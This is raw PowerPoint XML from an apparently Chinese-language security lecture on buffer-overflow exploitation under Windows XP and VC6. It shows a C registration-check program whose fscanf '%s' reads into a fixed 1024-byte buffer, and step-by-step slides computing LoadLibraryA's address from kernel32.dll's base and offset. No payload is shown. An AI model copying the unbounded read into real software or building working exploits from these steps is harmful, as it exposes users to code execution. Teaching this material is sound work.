            <a:ext cx="4020395" cy="88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kernel32.dll</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基地址</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0x75b60000</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函数地址偏移量</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0x001c9298</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rPr>
              <a:t>LoadLibraryA</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函数地址</a:t>
            </a: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0x75D29298</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="123" name="组合 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888AEDF4-3897-E23A-8875-21995B408E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1880153" y="2573759"/>
            <a:ext cx="2718210" cy="356892"/>
            <a:chOff x="3245972" y="2575257"/>
            <a:chExt cx="2718210" cy="356892"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="122" name="组合 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E3E52F-EA1C-5057-69C3-9EA11F98CD96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5107453" y="2575258"/>
              <a:ext cx="856729" cy="356891"/>
              <a:chOff x="3129918" y="2334540"/>
              <a:chExt cx="856729" cy="356891"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="62" name="矩形 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84B4ECB1-C662-C2A8-0D93-A5D5E0AEBE08}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3705148" y="2334540"/>
                <a:ext cx="281499" cy="352678"/>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5" name="矩形 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265FB902-4543-F1B6-CF78-19D979CA4724}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3129918" y="2334540"/>
                <a:ext cx="575229" cy="3568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0x3C</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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="矩形 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70956401-5A78-46DB-DEE1-90F2DF7268A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3245972" y="2575257"/>
              <a:ext cx="1860621" cy="356892"/>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kennel32.dll</a:t>
              </a:r>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基地址</a:t>
              </a:r>
              <a:endPar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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102" name="肘形连接符 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37D19FD-37A9-9D58-C768-B239A6345599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="94" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2810465" y="1957851"/>
            <a:ext cx="8304995" cy="615907"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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3D767799-F189-EDCC-84FD-59EF638A45A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102695" y="1586758"/>
            <a:ext cx="0" cy="366073"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0048AA"/>
            </a:solidFill>
            <a:headEnd type="oval"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="矩形 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF09E9EE-E5EB-BE35-BE60-112AB56B8A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900793" y="1425820"/>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第一步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="直线箭头连接符 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC58F85-B438-5B7F-0BCC-BB85E333C4D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3987439" y="1607715"/>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737BF94A-6BA1-DBEE-7E92-CE99F2F1FA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5711107" y="1607714"/>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D4955767-22ED-8BE8-5BAE-CEA36283034F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7424588" y="1607713"/>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线箭头连接符 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AC4664-4F20-A96E-06C8-81F6A407BFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8832945" y="1612908"/>
            <a:ext cx="414534" cy="3523"/>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3F73A439-5333-505E-155F-4A680A88E7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897298" y="2575846"/>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第二步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="126" name="直线箭头连接符 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031C0590-4B32-704A-1326-5A032E2FC0A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="68" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4435366" y="2752429"/>
            <a:ext cx="595533" cy="0"/>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线箭头连接符 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961300DE-AD74-4AA5-FEEC-45520CB46521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314811" y="2743562"/>
            <a:ext cx="595533" cy="0"/>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矩形 132">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0D91AB-4688-DA07-56CF-7F8639E2BFCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897298" y="3725872"/>
            <a:ext cx="688345" cy="3538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rPr>
              <a:t>第三步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="136" name="直线箭头连接符 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E7712A-CA06-9221-99A3-9A164E6E1263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9266127" y="2787449"/>
            <a:ext cx="0" cy="933178"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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D82CBACE-A070-0166-E21F-5E40918ACFE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709707" y="4338285"/>
            <a:ext cx="1850159" cy="1203527"/>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1:</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1001:0x001c9298</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="矩形 137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB6A379-39D1-34C6-B8D8-208A567521D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132649" y="4338285"/>
            <a:ext cx="1970045" cy="1203527"/>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0:AccessCheck...</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1:AccessCheck...</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1"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rPr>
              <a:t>1001:LoadLibraryA</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140" name="直线连接符 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199704BC-1146-8798-24DA-BF3870B061BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8559865" y="4509120"/>
            <a:ext cx="572785"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141" name="直线连接符 140">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A49656-FCFA-41AE-C8A6-6BC873576533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8559864" y="4797152"/>
            <a:ext cx="572785"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142" name="直线连接符 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EAEF84-7F4D-5C7D-78E1-88CC89BBCA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8559864" y="5301208"/>
            <a:ext cx="572785" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0048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1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FEA0D78-1385-719C-4EF9-069CC2B7058E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1148820"/>
            <a:ext cx="4824536" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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main</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>argc</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char</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a: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int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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>vFlag</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FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>char</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01080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regcode</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1024</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795E26"/>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LoadLibrary</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"user32.dll"</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    FILE *fp;</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if</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fopen</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"reg.txt"</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err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rw</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exit</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098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fscanf</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000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%s</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regcode</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>vFlag</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>verify</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000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regcode</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if</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000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>vFlag</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>printf</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"wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>!"</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else</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err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>printf</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a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"passed!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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445936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环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VC6</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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1424" y="1929217"/>
            <a:ext cx="4824536" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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stdio.h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windows.h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r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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A31515"/>
                </a:solidFill>
